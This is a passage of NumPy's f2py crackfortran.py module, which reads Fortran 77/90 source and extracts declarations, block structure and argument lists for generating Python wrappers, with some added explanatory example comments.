grlee77/numpy | numpy/f2py/crackfortran.py | 1 | 130739 | #!/usr/bin/env python3
"""
crackfortran --- read fortran (77,90) code and extract declaration information.
Copyright 1999-2004 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/09/27 07:13:49 $
Pearu Peterson
Usage of crackfortran:
======================
Command line keys: -quiet,-verbose,-fix,-f77,-f90,-show,-h <pyffilename>
-m <module name for f77 routines>,--ignore-contains
Functions: crackfortran, crack2fortran
The following Fortran statements/constructions are supported
(or will be if needed):
block data,byte,call,character,common,complex,contains,data,
dimension,double complex,double precision,end,external,function,
implicit,integer,intent,interface,intrinsic,
logical,module,optional,parameter,private,public,
program,real,(sequence?),subroutine,type,use,virtual,
include,pythonmodule
Note: 'virtual' is mapped to 'dimension'.
Note: 'implicit integer (z) static (z)' is 'implicit static (z)' (this is a minor bug).
Note: code after 'contains' will be ignored until its scope ends.
Note: 'common' statement is extended: dimensions are moved to variable definitions
Note: f2py directive: <commentchar>f2py<line> is read as <line>
Note: pythonmodule is introduced to represent Python module
Usage:
`postlist=crackfortran(files)`
`postlist` contains declaration information read from the list of files `files`.
`crack2fortran(postlist)` returns a fortran code to be saved to pyf-file
`postlist` has the following structure:
*** it is a list of dictionaries containing `blocks':
B = {'block','body','vars','parent_block'[,'name','prefix','args','result',
'implicit','externals','interfaced','common','sortvars',
'commonvars','note']}
B['block'] = 'interface' | 'function' | 'subroutine' | 'module' |
'program' | 'block data' | 'type' | 'pythonmodule'
B['body'] --- list containing `subblocks' with the same structure as `blocks'
B['parent_block'] --- dictionary of a parent block:
C['body'][<index>]['parent_block'] is C
B['vars'] --- dictionary of variable definitions
B['sortvars'] --- dictionary of variable definitions sorted by dependence (independent first)
B['name'] --- name of the block (not if B['block']=='interface')
B['prefix'] --- prefix string (only if B['block']=='function')
B['args'] --- list of argument names if B['block']== 'function' | 'subroutine'
B['result'] --- name of the return value (only if B['block']=='function')
B['implicit'] --- dictionary {'a':<variable definition>,'b':...} | None
B['externals'] --- list of variables being external
B['interfaced'] --- list of variables being external and defined
B['common'] --- dictionary of common blocks (list of objects)
B['commonvars'] --- list of variables used in common blocks (dimensions are moved to variable definitions)
B['from'] --- string showing the 'parents' of the current block
B['use'] --- dictionary of modules used in current block:
{<modulename>:{['only':<0|1>],['map':{<local_name1>:<use_name1>,...}]}}
B['note'] --- list of LaTeX comments on the block
B['f2pyenhancements'] --- optional dictionary
{'threadsafe':'','fortranname':<name>,
'callstatement':<C-expr>|<multi-line block>,
'callprotoargument':<C-expr-list>,
'usercode':<multi-line block>|<list of multi-line blocks>,
'pymethoddef:<multi-line block>'
}
B['entry'] --- dictionary {entryname:argslist,..}
B['varnames'] --- list of variable names given in the order of reading the
Fortran code, useful for derived types.
B['saved_interface'] --- a string of scanned routine signature, defines explicit interface
*** Variable definition is a dictionary
D = B['vars'][<variable name>] =
{'typespec'[,'attrspec','kindselector','charselector','=','typename']}
D['typespec'] = 'byte' | 'character' | 'complex' | 'double complex' |
'double precision' | 'integer' | 'logical' | 'real' | 'type'
D['attrspec'] --- list of attributes (e.g. 'dimension(<arrayspec>)',
'external','intent(in|out|inout|hide|c|callback|cache|aligned4|aligned8|aligned16)',
'optional','required', etc)
K = D['kindselector'] = {['*','kind']} (only if D['typespec'] =
'complex' | 'integer' | 'logical' | 'real' )
C = D['charselector'] = {['*','len','kind']}
(only if D['typespec']=='character')
D['='] --- initialization expression string
D['typename'] --- name of the type if D['typespec']=='type'
D['dimension'] --- list of dimension bounds
D['intent'] --- list of intent specifications
D['depend'] --- list of variable names on which current variable depends on
D['check'] --- list of C-expressions; if C-expr returns zero, exception is raised
D['note'] --- list of LaTeX comments on the variable
*** Meaning of kind/char selectors (few examples):
D['typespec']*K['*']
D['typespec'](kind=K['kind'])
character*C['*']
character(len=C['len'],kind=C['kind'])
(see also fortran type declaration statement formats below)
Fortran 90 type declaration statement format (F77 is subset of F90)
====================================================================
(Main source: IBM XL Fortran 5.1 Language Reference Manual)
type declaration = <typespec> [[<attrspec>]::] <entitydecl>
<typespec> = byte |
character[<charselector>] |
complex[<kindselector>] |
double complex |
double precision |
integer[<kindselector>] |
logical[<kindselector>] |
real[<kindselector>] |
type(<typename>)
<charselector> = * <charlen> |
([len=]<len>[,[kind=]<kind>]) |
(kind=<kind>[,len=<len>])
<kindselector> = * <intlen> |
([kind=]<kind>)
<attrspec> = comma separated list of attributes.
Only the following attributes are used in
building up the interface:
external
(parameter --- affects '=' key)
optional
intent
Other attributes are ignored.
<intentspec> = in | out | inout
<arrayspec> = comma separated list of dimension bounds.
<entitydecl> = <name> [[*<charlen>][(<arrayspec>)] | [(<arrayspec>)]*<charlen>]
[/<init_expr>/ | =<init_expr>] [,<entitydecl>]
In addition, the following attributes are used: check,depend,note
TODO:
* Apply 'parameter' attribute (e.g. 'integer parameter :: i=2' 'real x(i)'
-> 'real x(2)')
The above may be solved by creating appropriate preprocessor program, for example.
"""
import sys
import string
import fileinput
import re
import os
import copy
import platform
from . import __version__
# The environment provided by auxfuncs.py is needed for some calls to eval.
# As the needed functions cannot be determined by static inspection of the
# code, it is safest to use import * pending a major refactoring of f2py.
from .auxfuncs import *
f2py_version = __version__.version
# Global flags:
strictf77 = 1 # Ignore `!' comments unless line[0]=='!'
sourcecodeform = 'fix' # 'fix','free'
quiet = 0 # Be verbose if 0 (Obsolete: not used any more)
verbose = 1 # Be quiet if 0, extra verbose if > 1.
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0 # for old F77 programs without 'program' statement
ignorecontains = 1
dolowercase = 1
debug = []
# Global variables
beginpattern = ''
currentfilename = ''
expectbegin = 1
f90modulevars = {}
filepositiontext = ''
gotnextfile = 1
groupcache = None
groupcounter = 0
grouplist = {groupcounter: []}
groupname = ''
include_paths = []
neededmodule = -1
onlyfuncs = []
previous_context = None
skipblocksuntil = -1
skipfuncs = []
skipfunctions = []
usermodules = []
def reset_global_f2py_vars():
global groupcounter, grouplist, neededmodule, expectbegin
global skipblocksuntil, usermodules, f90modulevars, gotnextfile
global filepositiontext, currentfilename, skipfunctions, skipfuncs
global onlyfuncs, include_paths, previous_context
global strictf77, sourcecodeform, quiet, verbose, tabchar, pyffilename
global f77modulename, skipemptyends, ignorecontains, dolowercase, debug
# flags
strictf77 = 1
sourcecodeform = 'fix'
quiet = 0
verbose = 1
tabchar = 4 * ' '
pyffilename = ''
f77modulename = ''
skipemptyends = 0
ignorecontains = 1
dolowercase = 1
debug = []
# variables
groupcounter = 0
grouplist = {groupcounter: []}
neededmodule = -1
expectbegin = 1
skipblocksuntil = -1
usermodules = []
f90modulevars = {}
gotnextfile = 1
filepositiontext = ''
currentfilename = ''
skipfunctions = []
skipfuncs = []
onlyfuncs = []
include_paths = []
previous_context = None
def outmess(line, flag=1):
global filepositiontext
if not verbose:
return
if not quiet:
if flag:
sys.stdout.write(filepositiontext)
sys.stdout.write(line)
re._MAXCACHE = 50  # cap the stdlib regex pattern cache (private CPython attribute)
defaultimplicitrules = {}
for c in "abcdefghopqrstuvwxyz$_":
defaultimplicitrules[c] = {'typespec': 'real'}
for c in "ijklmn":
defaultimplicitrules[c] = {'typespec': 'integer'}
del c
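# Editor's illustration (not part of the original f2py sources): these tables
# encode the classic Fortran implicit typing rule -- an undeclared name
# starting with i-n is INTEGER, anything else is REAL, e.g.
#   defaultimplicitrules['n']  -> {'typespec': 'integer'}
#   defaultimplicitrules['x']  -> {'typespec': 'real'}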
badnames = {}
invbadnames = {}
for n in ['int', 'double', 'float', 'char', 'short', 'long', 'void', 'case', 'while',
'return', 'signed', 'unsigned', 'if', 'for', 'typedef', 'sizeof', 'union',
'struct', 'static', 'register', 'new', 'break', 'do', 'goto', 'switch',
'continue', 'else', 'inline', 'extern', 'delete', 'const', 'auto',
'len', 'rank', 'shape', 'index', 'slen', 'size', '_i',
'max', 'min',
'flen', 'fshape',
'string', 'complex_double', 'float_double', 'stdin', 'stderr', 'stdout',
'type', 'default']:
badnames[n] = n + '_bn'
invbadnames[n + '_bn'] = n
def rmbadname1(name):
if name in badnames:
errmess('rmbadname1: Replacing "%s" with "%s".\n' %
(name, badnames[name]))
return badnames[name]
return name
def rmbadname(names):
return [rmbadname1(_m) for _m in names]
def undo_rmbadname1(name):
if name in invbadnames:
errmess('undo_rmbadname1: Replacing "%s" with "%s".\n'
% (name, invbadnames[name]))
return invbadnames[name]
return name
def undo_rmbadname(names):
return [undo_rmbadname1(_m) for _m in names]
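# Editor's illustration (not part of the original f2py sources): names that
# would collide with C keywords or f2py helpers get a "_bn" suffix that is
# later undone, e.g.
#   rmbadname1('len')          -> 'len_bn'   (and logs the replacement)
#   undo_rmbadname1('len_bn')  -> 'len'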
def getextension(name):
i = name.rfind('.')
if i == -1:
return ''
if '\\' in name[i:]:
return ''
if '/' in name[i:]:
return ''
return name[i + 1:]
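# Editor's illustration (not part of the original f2py sources): the
# extension is taken from the last '.' only when no path separator follows
# it, e.g.
#   getextension('src/foo.f90')  -> 'f90'
#   getextension('foo.d/bar')    -> ''   (the '.' belongs to a directory)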
is_f_file = re.compile(r'.*[.](for|ftn|f77|f)\Z', re.I).match
_has_f_header = re.compile(r'-[*]-\s*fortran\s*-[*]-', re.I).search
_has_f90_header = re.compile(r'-[*]-\s*f90\s*-[*]-', re.I).search
_has_fix_header = re.compile(r'-[*]-\s*fix\s*-[*]-', re.I).search
_free_f90_start = re.compile(r'[^c*]\s*[^\s\d\t]', re.I).match
def is_free_format(file):
"""Check if file is in free format Fortran."""
# f90 allows both fixed and free format, assuming fixed unless
# signs of free format are detected.
result = 0
with open(file, 'r') as f:
line = f.readline()
n = 15 # the number of non-comment lines to scan for hints
if _has_f_header(line):
n = 0
elif _has_f90_header(line):
n = 0
result = 1
while n > 0 and line:
if line[0] != '!' and line.strip():
n -= 1
if (line[0] != '\t' and _free_f90_start(line[:5])) or line[-2:-1] == '&':
result = 1
break
line = f.readline()
return result
# Read fortran (77,90) code
def readfortrancode(ffile, dowithline=show, istop=1):
"""
    Read Fortran code from files and
     1) Get rid of comments, line continuations, and empty lines; lowercase the source.
     2) Call dowithline(line) on every line.
     3) Recursively call itself when the statement \"include '<filename>'\" is met.
"""
global gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77
global beginpattern, quiet, verbose, dolowercase, include_paths
if not istop:
saveglobals = gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase
if ffile == []:
return
localdolowercase = dolowercase
cont = 0
finalline = ''
ll = ''
includeline = re.compile(
r'\s*include\s*(\'|")(?P<name>[^\'"]*)(\'|")', re.I)
cont1 = re.compile(r'(?P<line>.*)&\s*\Z')
cont2 = re.compile(r'(\s*&|)(?P<line>.*)')
mline_mark = re.compile(r".*?'''")
if istop:
dowithline('', -1)
ll, l1 = '', ''
spacedigits = [' '] + [str(_m) for _m in range(10)]
filepositiontext = ''
fin = fileinput.FileInput(ffile)
while True:
l = fin.readline()
if not l:
break
if fin.isfirstline():
filepositiontext = ''
currentfilename = fin.filename()
gotnextfile = 1
l1 = l
strictf77 = 0
sourcecodeform = 'fix'
ext = os.path.splitext(currentfilename)[1]
if is_f_file(currentfilename) and \
not (_has_f90_header(l) or _has_fix_header(l)):
strictf77 = 1
elif is_free_format(currentfilename) and not _has_fix_header(l):
sourcecodeform = 'free'
if strictf77:
beginpattern = beginpattern77
else:
beginpattern = beginpattern90
outmess('\tReading file %s (format:%s%s)\n'
% (repr(currentfilename), sourcecodeform,
strictf77 and ',strict' or ''))
l = l.expandtabs().replace('\xa0', ' ')
# Get rid of newline characters
while not l == '':
if l[-1] not in "\n\r\f":
break
l = l[:-1]
if not strictf77:
(l, rl) = split_by_unquoted(l, '!')
l += ' '
if rl[:5].lower() == '!f2py': # f2py directive
l, _ = split_by_unquoted(l + 4 * ' ' + rl[5:], '!')
if l.strip() == '': # Skip empty line
cont = 0
continue
if sourcecodeform == 'fix':
if l[0] in ['*', 'c', '!', 'C', '#']:
if l[1:5].lower() == 'f2py': # f2py directive
l = ' ' + l[5:]
else: # Skip comment line
cont = 0
continue
elif strictf77:
if len(l) > 72:
l = l[:72]
if not (l[0] in spacedigits):
raise Exception('readfortrancode: Found non-(space,digit) char '
'in the first column.\n\tAre you sure that '
'this code is in fix form?\n\tline=%s' % repr(l))
if (not cont or strictf77) and (len(l) > 5 and not l[5] == ' '):
# Continuation of a previous line
ll = ll + l[6:]
finalline = ''
origfinalline = ''
else:
if not strictf77:
# F90 continuation
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
# clean up line beginning from possible digits.
l = ' ' + l[5:]
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
elif sourcecodeform == 'free':
if not cont and ext == '.pyf' and mline_mark.match(l):
l = l + '\n'
while True:
lc = fin.readline()
if not lc:
errmess(
'Unexpected end of file when reading multiline\n')
break
l = l + lc
if mline_mark.match(lc):
break
l = l.rstrip()
r = cont1.match(l)
if r:
l = r.group('line') # Continuation follows ..
if cont:
ll = ll + cont2.match(l).group('line')
finalline = ''
origfinalline = ''
else:
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
ll = l
cont = (r is not None)
else:
raise ValueError(
"Flag sourcecodeform must be either 'fix' or 'free': %s" % repr(sourcecodeform))
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [
os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
l1 = ll
if localdolowercase:
finalline = ll.lower()
else:
finalline = ll
origfinalline = ll
filepositiontext = 'Line #%d in %s:"%s"\n\t' % (
fin.filelineno() - 1, currentfilename, l1)
m = includeline.match(origfinalline)
if m:
fn = m.group('name')
if os.path.isfile(fn):
readfortrancode(fn, dowithline=dowithline, istop=0)
else:
include_dirs = [os.path.dirname(currentfilename)] + include_paths
foundfile = 0
for inc_dir in include_dirs:
fn1 = os.path.join(inc_dir, fn)
if os.path.isfile(fn1):
foundfile = 1
readfortrancode(fn1, dowithline=dowithline, istop=0)
break
if not foundfile:
outmess('readfortrancode: could not find include file %s in %s. Ignoring.\n' % (
repr(fn), os.pathsep.join(include_dirs)))
else:
dowithline(finalline)
filepositiontext = ''
fin.close()
if istop:
dowithline('', 1)
else:
gotnextfile, filepositiontext, currentfilename, sourcecodeform, strictf77,\
beginpattern, quiet, verbose, dolowercase = saveglobals
# Crack line
beforethisafter = r'\s*(?P<before>%s(?=\s*(\b(%s)\b)))' + \
r'\s*(?P<this>(\b(%s)\b))' + \
r'\s*(?P<after>%s)\s*\Z'
##
fortrantypes = r'character|logical|integer|real|complex|double\s*(precision\s*(complex|)|complex)|type(?=\s*\([\w\s,=(*)]*\))|byte'
typespattern = re.compile(
beforethisafter % ('', fortrantypes, fortrantypes, '.*'), re.I), 'type'
typespattern4implicit = re.compile(beforethisafter % (
'', fortrantypes + '|static|automatic|undefined', fortrantypes + '|static|automatic|undefined', '.*'), re.I)
#
functionpattern = re.compile(beforethisafter % (
r'([a-z]+[\w\s(=*+-/)]*?|)', 'function', 'function', '.*'), re.I), 'begin'
subroutinepattern = re.compile(beforethisafter % (
r'[a-z\s]*?', 'subroutine', 'subroutine', '.*'), re.I), 'begin'
# modulepattern=re.compile(beforethisafter%('[a-z\s]*?','module','module','.*'),re.I),'begin'
#
groupbegins77 = r'program|block\s*data'
beginpattern77 = re.compile(
beforethisafter % ('', groupbegins77, groupbegins77, '.*'), re.I), 'begin'
groupbegins90 = groupbegins77 + \
r'|module(?!\s*procedure)|python\s*module|interface|type(?!\s*\()'
beginpattern90 = re.compile(
beforethisafter % ('', groupbegins90, groupbegins90, '.*'), re.I), 'begin'
groupends = (r'end|endprogram|endblockdata|endmodule|endpythonmodule|'
r'endinterface|endsubroutine|endfunction')
endpattern = re.compile(
beforethisafter % ('', groupends, groupends, r'[\w\s]*'), re.I), 'end'
# endifs='end\s*(if|do|where|select|while|forall)'
endifs = r'(end\s*(if|do|where|select|while|forall))|(module\s*procedure)'
endifpattern = re.compile(
beforethisafter % (r'[\w]*?', endifs, endifs, r'[\w\s]*'), re.I), 'endif'
#
implicitpattern = re.compile(
beforethisafter % ('', 'implicit', 'implicit', '.*'), re.I), 'implicit'
dimensionpattern = re.compile(beforethisafter % (
'', 'dimension|virtual', 'dimension|virtual', '.*'), re.I), 'dimension'
externalpattern = re.compile(
beforethisafter % ('', 'external', 'external', '.*'), re.I), 'external'
optionalpattern = re.compile(
beforethisafter % ('', 'optional', 'optional', '.*'), re.I), 'optional'
requiredpattern = re.compile(
beforethisafter % ('', 'required', 'required', '.*'), re.I), 'required'
publicpattern = re.compile(
beforethisafter % ('', 'public', 'public', '.*'), re.I), 'public'
privatepattern = re.compile(
beforethisafter % ('', 'private', 'private', '.*'), re.I), 'private'
intrinsicpattern = re.compile(
beforethisafter % ('', 'intrinsic', 'intrinsic', '.*'), re.I), 'intrinsic'
intentpattern = re.compile(beforethisafter % (
'', 'intent|depend|note|check', 'intent|depend|note|check', r'\s*\(.*?\).*'), re.I), 'intent'
parameterpattern = re.compile(
beforethisafter % ('', 'parameter', 'parameter', r'\s*\(.*'), re.I), 'parameter'
datapattern = re.compile(
beforethisafter % ('', 'data', 'data', '.*'), re.I), 'data'
callpattern = re.compile(
beforethisafter % ('', 'call', 'call', '.*'), re.I), 'call'
entrypattern = re.compile(
beforethisafter % ('', 'entry', 'entry', '.*'), re.I), 'entry'
callfunpattern = re.compile(
beforethisafter % ('', 'callfun', 'callfun', '.*'), re.I), 'callfun'
commonpattern = re.compile(
beforethisafter % ('', 'common', 'common', '.*'), re.I), 'common'
usepattern = re.compile(
beforethisafter % ('', 'use', 'use', '.*'), re.I), 'use'
containspattern = re.compile(
beforethisafter % ('', 'contains', 'contains', ''), re.I), 'contains'
formatpattern = re.compile(
beforethisafter % ('', 'format', 'format', '.*'), re.I), 'format'
# Non-fortran and f2py-specific statements
f2pyenhancementspattern = re.compile(beforethisafter % ('', 'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef',
'threadsafe|fortranname|callstatement|callprotoargument|usercode|pymethoddef', '.*'), re.I | re.S), 'f2pyenhancements'
multilinepattern = re.compile(
r"\s*(?P<before>''')(?P<this>.*?)(?P<after>''')\s*\Z", re.S), 'multiline'
##
def split_by_unquoted(line, characters):
"""
Splits the line into (line[:i], line[i:]),
    where i is the index of the first occurrence of one of the characters
    not within quotes, or len(line) if no such index exists.
"""
assert not (set('"\'') & set(characters)), "cannot split by unquoted quotes"
r = re.compile(
r"\A(?P<before>({single_quoted}|{double_quoted}|{not_quoted})*)"
r"(?P<after>{char}.*)\Z".format(
not_quoted="[^\"'{}]".format(re.escape(characters)),
char="[{}]".format(re.escape(characters)),
single_quoted=r"('([^'\\]|(\\.))*')",
double_quoted=r'("([^"\\]|(\\.))*")'))
m = r.match(line)
if m:
d = m.groupdict()
return (d["before"], d["after"])
return (line, "")
def _simplifyargs(argsline):
a = []
for n in markoutercomma(argsline).split('@,@'):
for r in '(),':
n = n.replace(r, '_')
a.append(n)
return ','.join(a)
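# Editor's illustration (not part of the original f2py sources): argument
# lists are flattened to plain identifiers so they can be embedded in a
# generated 'callfun' line, e.g.
#   _simplifyargs('a,b(1,2)')  -> 'a,b_1_2_'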
crackline_re_1 = re.compile(r'\s*(?P<result>\b[a-z]+[\w]*\b)\s*[=].*', re.I)
def crackline(line, reset=0):
"""
reset=-1 --- initialize
reset=0 --- crack the line
reset=1 --- final check if mismatch of blocks occurred
Cracked data is saved in grouplist[0].
"""
global beginpattern, groupcounter, groupname, groupcache, grouplist
global filepositiontext, currentfilename, neededmodule, expectbegin
global skipblocksuntil, skipemptyends, previous_context, gotnextfile
_, has_semicolon = split_by_unquoted(line, ";")
if has_semicolon and not (f2pyenhancementspattern[0].match(line) or
multilinepattern[0].match(line)):
# XXX: non-zero reset values need testing
assert reset == 0, repr(reset)
# split line on unquoted semicolons
line, semicolon_line = split_by_unquoted(line, ";")
while semicolon_line:
crackline(line, reset)
line, semicolon_line = split_by_unquoted(semicolon_line[1:], ";")
crackline(line, reset)
return
if reset < 0:
groupcounter = 0
groupname = {groupcounter: ''}
groupcache = {groupcounter: {}}
grouplist = {groupcounter: []}
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = ''
groupcache[groupcounter]['name'] = ''
neededmodule = -1
skipblocksuntil = -1
return
if reset > 0:
fl = 0
if f77modulename and neededmodule == groupcounter:
fl = 2
while groupcounter > fl:
outmess('crackline: groupcounter=%s groupname=%s\n' %
(repr(groupcounter), repr(groupname)))
outmess(
'crackline: Mismatch of blocks encountered. Trying to fix it by assuming "end" statement.\n')
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if f77modulename and neededmodule == groupcounter:
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end interface
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1 # end module
neededmodule = -1
return
if line == '':
return
flag = 0
for pat in [dimensionpattern, externalpattern, intentpattern, optionalpattern,
requiredpattern,
parameterpattern, datapattern, publicpattern, privatepattern,
intrinsicpattern,
endifpattern, endpattern,
formatpattern,
beginpattern, functionpattern, subroutinepattern,
implicitpattern, typespattern, commonpattern,
callpattern, usepattern, containspattern,
entrypattern,
f2pyenhancementspattern,
multilinepattern
]:
m = pat[0].match(line)
if m:
break
flag = flag + 1
if not m:
re_1 = crackline_re_1
if 0 <= skipblocksuntil <= groupcounter:
return
if 'externals' in groupcache[groupcounter]:
for name in groupcache[groupcounter]['externals']:
if name in invbadnames:
name = invbadnames[name]
if 'interfaced' in groupcache[groupcounter] and name in groupcache[groupcounter]['interfaced']:
continue
m1 = re.match(
r'(?P<before>[^"]*)\b%s\b\s*@\(@(?P<args>[^@]*)@\)@.*\Z' % name, markouterparen(line), re.I)
if m1:
m2 = re_1.match(m1.group('before'))
a = _simplifyargs(m1.group('args'))
if m2:
line = 'callfun %s(%s) result (%s)' % (
name, a, m2.group('result'))
else:
line = 'callfun %s(%s)' % (name, a)
m = callfunpattern[0].match(line)
if not m:
outmess(
'crackline: could not resolve function call for line=%s.\n' % repr(line))
return
analyzeline(m, 'callfun', line)
return
if verbose > 1 or (verbose == 1 and currentfilename.lower().endswith('.pyf')):
previous_context = None
outmess('crackline:%d: No pattern for line\n' % (groupcounter))
return
elif pat[1] == 'end':
if 0 <= skipblocksuntil < groupcounter:
groupcounter = groupcounter - 1
if skipblocksuntil <= groupcounter:
return
if groupcounter <= 0:
raise Exception('crackline: groupcounter(=%s) is nonpositive. '
'Check the blocks.'
% (groupcounter))
        m1 = beginpattern[0].match(line)
        if m1 and m1.group('this') != groupname[groupcounter]:
raise Exception('crackline: End group %s does not match with '
'previous Begin group %s\n\t%s' %
(repr(m1.group('this')), repr(groupname[groupcounter]),
filepositiontext)
)
if skipblocksuntil == groupcounter:
skipblocksuntil = -1
grouplist[groupcounter - 1].append(groupcache[groupcounter])
grouplist[groupcounter - 1][-1]['body'] = grouplist[groupcounter]
del grouplist[groupcounter]
groupcounter = groupcounter - 1
if not skipemptyends:
expectbegin = 1
elif pat[1] == 'begin':
if 0 <= skipblocksuntil <= groupcounter:
groupcounter = groupcounter + 1
return
gotnextfile = 0
analyzeline(m, pat[1], line)
expectbegin = 0
elif pat[1] == 'endif':
pass
elif pat[1] == 'contains':
if ignorecontains:
return
if 0 <= skipblocksuntil <= groupcounter:
return
skipblocksuntil = groupcounter
else:
if 0 <= skipblocksuntil <= groupcounter:
return
analyzeline(m, pat[1], line)
def markouterparen(line):
l = ''
f = 0
for c in line:
if c == '(':
f = f + 1
if f == 1:
l = l + '@(@'
continue
elif c == ')':
f = f - 1
if f == 0:
l = l + '@)@'
continue
l = l + c
return l
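# Editor's illustration (not part of the original f2py sources): only the
# outermost parentheses are marked, which lets later regexps anchor on
# '@(@'/'@)@' without a real parser, e.g.
#   markouterparen('f(a(1),b)')  -> 'f@(@a(1),b@)@'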
def markoutercomma(line, comma=','):
l = ''
f = 0
before, after = split_by_unquoted(line, comma + '()')
l += before
while after:
if (after[0] == comma) and (f == 0):
l += '@' + comma + '@'
else:
l += after[0]
if after[0] == '(':
f += 1
elif after[0] == ')':
f -= 1
before, after = split_by_unquoted(after[1:], comma + '()')
l += before
assert not f, repr((f, line, l))
return l
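# Editor's illustration (not part of the original f2py sources): only commas
# at parenthesis depth zero are marked, so comma-separated declarations can
# be split safely, e.g.
#   markoutercomma('a,b(1,2),c')  -> 'a@,@b(1,2)@,@c'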
def unmarkouterparen(line):
r = line.replace('@(@', '(').replace('@)@', ')')
return r
def appenddecl(decl, decl2, force=1):
if not decl:
decl = {}
if not decl2:
return decl
if decl is decl2:
return decl
for k in list(decl2.keys()):
if k == 'typespec':
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'attrspec':
for l in decl2[k]:
decl = setattrspec(decl, l, force)
elif k == 'kindselector':
decl = setkindselector(decl, decl2[k], force)
elif k == 'charselector':
decl = setcharselector(decl, decl2[k], force)
elif k in ['=', 'typename']:
if force or k not in decl:
decl[k] = decl2[k]
elif k == 'note':
pass
elif k in ['intent', 'check', 'dimension', 'optional', 'required']:
errmess('appenddecl: "%s" not implemented.\n' % k)
else:
raise Exception('appenddecl: Unknown variable definition key:' +
str(k))
return decl
selectpattern = re.compile(
r'\s*(?P<this>(@\(@.*?@\)@|[*][\d*]+|[*]\s*@\(@.*?@\)@|))(?P<after>.*)\Z', re.I)
nameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*(@\(@\s*(?P<args>[\w\s,]*)\s*@\)@|)\s*((result(\s*@\(@\s*(?P<result>\b[\w$]+\b)\s*@\)@|))|(bind\s*@\(@\s*(?P<bind>.*)\s*@\)@))*\s*\Z', re.I)
callnameargspattern = re.compile(
r'\s*(?P<name>\b[\w$]+\b)\s*@\(@\s*(?P<args>.*)\s*@\)@\s*\Z', re.I)
real16pattern = re.compile(
r'([-+]?(?:\d+(?:\.\d*)?|\d*\.\d+))[dD]((?:[-+]?\d+)?)')
real8pattern = re.compile(
r'([-+]?((?:\d+(?:\.\d*)?|\d*\.\d+))[eE]((?:[-+]?\d+)?)|(\d+\.\d*))')
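# Editor's note (not part of the original f2py sources): real16pattern
# recognizes real literals written with a D exponent (double precision,
# e.g. '1.5d0'); real8pattern recognizes E-exponent or plain decimal
# literals (e.g. '1.5e0', '3.14').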
_intentcallbackpattern = re.compile(r'intent\s*\(.*?\bcallback\b', re.I)
def _is_intent_callback(vdecl):
for a in vdecl.get('attrspec', []):
if _intentcallbackpattern.match(a):
return 1
return 0
def _resolvenameargspattern(line):
line = markouterparen(line)
m1 = nameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), m1.group('result'), m1.group('bind')
m1 = callnameargspattern.match(line)
if m1:
return m1.group('name'), m1.group('args'), None, None
return None, [], None, None
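# Editor's illustration (not part of the original f2py sources): the raw
# "after" part of a begin statement is split into (name, args, result, bind),
# e.g.
#   _resolvenameargspattern('foo(a, b) result(c)')  -> ('foo', 'a, b', 'c', None)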
def analyzeline(m, case, line):
global groupcounter, groupname, groupcache, grouplist, filepositiontext
global currentfilename, f77modulename, neededinterface, neededmodule
global expectbegin, gotnextfile, previous_context
block = m.group('this')
if case != 'multiline':
previous_context = None
if expectbegin and case not in ['begin', 'call', 'callfun', 'type'] \
and not skipemptyends and groupcounter < 1:
newname = os.path.basename(currentfilename).split('.')[0]
outmess(
'analyzeline: no group yet. Creating program group with name "%s".\n' % newname)
gotnextfile = 0
groupcounter = groupcounter + 1
groupname[groupcounter] = 'program'
groupcache[groupcounter] = {}
grouplist[groupcounter] = []
groupcache[groupcounter]['body'] = []
groupcache[groupcounter]['vars'] = {}
groupcache[groupcounter]['block'] = 'program'
groupcache[groupcounter]['name'] = newname
groupcache[groupcounter]['from'] = 'fromsky'
expectbegin = 0
if case in ['begin', 'call', 'callfun']:
# Crack line => block,name,args,result
block = block.lower()
if re.match(r'block\s*data', block, re.I):
block = 'block data'
if re.match(r'python\s*module', block, re.I):
block = 'python module'
name, args, result, bind = _resolvenameargspattern(m.group('after'))
if name is None:
if block == 'block data':
name = '_BLOCK_DATA_'
else:
name = ''
if block not in ['interface', 'block data']:
outmess('analyzeline: No name/args pattern found for line.\n')
previous_context = (block, name, groupcounter)
if args:
args = rmbadname([x.strip()
for x in markoutercomma(args).split('@,@')])
else:
args = []
if '' in args:
while '' in args:
args.remove('')
outmess(
'analyzeline: argument list is malformed (missing argument).\n')
